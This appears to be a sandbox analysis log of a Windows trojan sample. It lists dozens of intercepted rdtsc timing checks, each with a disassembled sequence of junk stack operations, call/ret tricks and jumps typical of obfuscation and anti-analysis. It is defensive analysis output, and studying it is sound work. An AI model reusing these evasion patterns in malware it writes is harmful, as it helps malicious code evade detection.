Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D35078 second address: D350D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F3620DC9109h 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 je 00007F3620DC9101h 0x00000017 jmp 00007F3620DC90FBh 0x0000001c pop ebx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F3620DC90F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D2B01h] 0x0000003f xchg eax, esi 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D350D9 second address: D350DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D350DD second address: D350E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D360CE second address: D360E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F362081F59Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D360E2 second address: D360E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D351C7 second address: D351D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D381BD second address: D381C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3747A second address: D37480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D381C3 second address: D38225 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3620DC90F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F3620DC9107h 0x00000012 push 00000000h 0x00000014 movzx edi, di 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F3620DC90F8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D3309h], esi 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F3620DC90F8h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D37480 second address: D37484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3931C second address: D39346 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3620DC910Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e je 00007F3620DC90F6h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39346 second address: D3934C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39492 second address: D39496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D39496 second address: D394AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F362081F59Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C2DD second address: D3C366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F3620DC9102h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F3620DC90F8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a movsx edi, cx 0x0000002d jnl 00007F3620DC90FFh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007F3620DC90F8h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f sbb edi, 101757C8h 0x00000055 xchg eax, esi 0x00000056 push ecx 0x00000057 pushad 0x00000058 push ecx 0x00000059 pop ecx 0x0000005a jp 00007F3620DC90F6h 0x00000060 popad 0x00000061 pop ecx 0x00000062 push eax 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 pop eax 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C366 second address: D3C36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3B552 second address: D3B56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F3620DC9102h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D441 second address: D3D455 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F362081F59Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4E4 second address: D3C4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4E8 second address: D3C4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F362081F5A4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3C4FA second address: D3C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3F277 second address: D3F27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D402D0 second address: D402E3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3620DC90F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D402E3 second address: D402E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE397A second address: CE39B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC90FDh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F3620DC90FBh 0x0000000f popad 0x00000010 js 00007F3620DC9102h 0x00000016 jbe 00007F3620DC90F6h 0x0000001c jng 00007F3620DC90F6h 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pushad 0x00000025 jo 00007F3620DC90FEh 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE39B7 second address: CE39CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F5A0h 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42982 second address: D42986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42986 second address: D42A21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F362081F5A4h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F362081F598h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F362081F59Bh 0x0000002c mov di, si 0x0000002f jmp 00007F362081F5A0h 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D2FECh] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ebp 0x00000041 call 00007F362081F598h 0x00000046 pop ebp 0x00000047 mov dword ptr [esp+04h], ebp 0x0000004b add dword ptr [esp+04h], 00000015h 0x00000053 inc ebp 0x00000054 push ebp 0x00000055 ret 0x00000056 pop ebp 0x00000057 ret 0x00000058 jmp 00007F362081F59Ah 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jo 00007F362081F59Ch 0x00000065 je 00007F362081F596h 0x0000006b push eax 0x0000006c push edx 0x0000006d push ebx 0x0000006e pop ebx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42A21 second address: D42A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3620DC90F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4054C second address: D40556 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D40556 second address: D4057A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jc 00007F3620DC90FCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5B9 second address: D3D5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D42C00 second address: D42C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC9107h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5BE second address: D3D5C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D5C3 second address: D3D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F3620DC9106h 0x0000000f je 00007F3620DC90F6h 0x00000015 popad 0x00000016 pop esi 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D23ACh], ecx 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov di, CFB2h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 and edi, dword ptr [ebp+1246044Ah] 0x00000036 mov eax, dword ptr [ebp+122D0ADDh] 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F3620DC90F8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D5B03h], edi 0x0000005c mov ebx, dword ptr [ebp+122D2E75h] 0x00000062 push FFFFFFFFh 0x00000064 sub dword ptr [ebp+1245D9D6h], edx 0x0000006a nop 0x0000006b pushad 0x0000006c jmp 00007F3620DC9103h 0x00000071 pushad 0x00000072 jmp 00007F3620DC90FDh 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D3D669 second address: D3D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44A59 second address: D44A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44AF5 second address: D44AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D43CF1 second address: D43D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push edx 0x00000009 call 00007F3620DC90F8h 0x0000000e pop edx 0x0000000f mov dword ptr [esp+04h], edx 0x00000013 add dword ptr [esp+04h], 00000019h 0x0000001b inc edx 0x0000001c push edx 0x0000001d ret 0x0000001e pop edx 0x0000001f ret 0x00000020 push dword ptr fs:[00000000h] 0x00000027 xor edi, dword ptr [ebp+122D213Bh] 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F3620DC90F8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov di, dx 0x00000051 jne 00007F3620DC90FCh 0x00000057 mov eax, dword ptr [ebp+122D15A1h] 0x0000005d or ebx, dword ptr [ebp+122D2D25h] 0x00000063 push FFFFFFFFh 0x00000065 mov bx, F629h 0x00000069 push eax 0x0000006a pushad 0x0000006b jnc 00007F3620DC90F8h 0x00000071 pushad 0x00000072 pushad 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D44AFB second address: D44B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F362081F59Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A3D second address: D45A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A42 second address: D45A56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A56 second address: D45A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45A5A second address: D45AC5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D1DC9h], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F362081F598h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov di, bx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F362081F598h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d je 00007F362081F599h 0x00000053 xor bh, 00000023h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b jbe 00007F362081F596h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D45AC5 second address: D45ACB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4B007 second address: D4B010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C5FB second address: D4C604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C604 second address: D4C60A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4C60A second address: D4C610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D50050 second address: D5006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5006D second address: D50073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CE5537 second address: CE553B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F722 second address: D4F755 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F3620DC9102h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F3620DC9102h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F755 second address: D4F75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F75B second address: D4F761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F761 second address: D4F76A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F76A second address: D4F776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3620DC90F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D4F8CC second address: D4F8D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D51763 second address: D5176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D561E0 second address: D56204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F362081F596h 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F362081F596h 0x00000012 jc 00007F362081F596h 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007F362081F596h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D56204 second address: D5622A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jns 00007F3620DC90F8h 0x0000001c jo 00007F3620DC90FCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5622A second address: D5624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F362081F5ABh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D5624E second address: D5627C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3620DC90FFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D56396 second address: D5639A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
